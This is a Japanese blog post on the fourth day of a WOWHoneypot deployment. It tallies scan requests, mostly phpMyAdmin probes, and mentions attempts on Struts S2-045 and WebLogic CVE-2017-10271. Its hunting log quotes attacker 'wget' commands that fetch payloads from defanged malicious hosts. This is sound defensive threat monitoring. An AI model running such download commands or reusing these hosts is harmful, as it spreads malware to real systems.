WOWHoneypot簡易分析(4日目)
WOWhoneypotの2018/6/7(運用4日目)の簡易分析です。
日付変わってから寝る前にさっと確認する感じで、やってみています。
本日のアクセス件数は143件でした。
42 [2018-06-07 "GET /
8 [2018-06-07 "GET /index.action
2 [2018-06-07 "GET /xampp/phpmyadmin/index.php
2 [2018-06-07 "GET /www/phpMyAdmin/index.php
2 [2018-06-07 "GET /web/phpMyAdmin/index.php
2 [2018-06-07 "GET /typo3/phpmyadmin/index.php
2 [2018-06-07 "GET /tools/phpMyAdmin/index.php
2 [2018-06-07 "GET /pmd/index.php
2 [2018-06-07 "GET /pma-old/index.php
2 [2018-06-07 "GET /pmamy/index.php
2 [2018-06-07 "GET /pmamy2/index.php
2 [2018-06-07 "GET /PMA/index.php
2 [2018-06-07 "GET /pma/index.php
2 [2018-06-07 "GET /PMA2/index.php
2 [2018-06-07 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-07 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-07 "GET /phpMyAdminold/index.php
2 [2018-06-07 "GET /phpMyAdmin.old/index.php
2 [2018-06-07 "GET /phpmyadmin-old/index.php
2 [2018-06-07 "GET /phpMyAdmin/index.php
2 [2018-06-07 "GET /phpmyadmin/index.php
2 [2018-06-07 "GET /phpMyadmin_bak/index.php
2 [2018-06-07 "GET /phpmyadmin2/index.php
2 [2018-06-07 "GET /phpmyadmin1/index.php
2 [2018-06-07 "GET /phpmyadmin0/index.php
2 [2018-06-07 "GET /phpma/index.php
2 [2018-06-07 "GET /phpadmin/index.php
2 [2018-06-07 "GET /mysql/index.php
2 [2018-06-07 "GET /mysqladmin/index.php
2 [2018-06-07 "GET /mysql-admin/index.php
2 [2018-06-07 "GET /myadmin/index.php
2 [2018-06-07 "GET /myadmin2/index.php
2 [2018-06-07 "GET /index.php
2 [2018-06-07 "GET /db/index.php
2 [2018-06-07 "GET /dbadmin/index.php
2 [2018-06-07 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-07 "GET /admin/PMA/index.php
2 [2018-06-07 "GET /admin/pma/index.php
2 [2018-06-07 "GET /admin/phpMyAdmin/index.php
2 [2018-06-07 "GET /admin/phpmyadmin/index.php
2 [2018-06-07 "GET /admin/phpmyadmin2/index.php
2 [2018-06-07 "GET /admin/mysql/index.php
2 [2018-06-07 "GET /admin/mysql2/index.php
2 [2018-06-07 "GET /admin/index.php
1 [2018-06-07 "PROPFIND /
1 [2018-06-07 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-07 "HEAD hxxp://(サーバIP):80/phpmyadmin/
1 [2018-06-07 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-07 "GET /pma/scripts/setup.php
1 [2018-06-07 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-07 "GET /myadmin/scripts/setup.php
1 [2018-06-07 "GET /manager/html
1 [2018-06-07 "GET /l.php
PhpMyAdmin関係が87件と大半を占めています。利用有無のスキャン行為と思われます。
/index.action のパスにアクセスしているApache Struts 2 の脆弱性 S2-045(CVE-2017-5638)を狙ったものは8件。これの取得するコードも昨日と同様です。
/wls-wsat/配下へのパスにアクセスしているWeblogicの脆弱性(CVE-2017-10271)を狙ったものも昨日と同様のIPへ取得しに行きます。
新しいものは、以下の2つ。
GET /l.php は詳細が不明です。
恐らくはWebShell等が埋め込まれているかの調査可と思います。
他の自動化された攻撃で既にやられていた場合に影響が出るパターンです。
hxxp://180.163.113[.]82/check_proxy は調べてみるとAbuseIPDBへ登録がありました。
180.163.113.82 | ChinaNet Shanghai Province Network | AbuseIPDB
他では、githubにこんなものも。これが当たりなかは不明です…。
また、本日のハンティングログはこちら。昨日と同じものが2件ずつ出ています。アクセス元IPは変わっています。
[2018-06-07 06:32:01+0900] 42.6.2[.]148 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-07 06:32:01+0900] 42.6.2[.]148 wget -c hxxp://wap.tfddos[.]net:57843/linux
[2018-06-07 06:32:14+0900] 42.6.2[.]148 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-07 06:32:14+0900] 42.6.2[.]148 wget -c hxxp://wap.tfddos[.]net:57843/linux
以上です。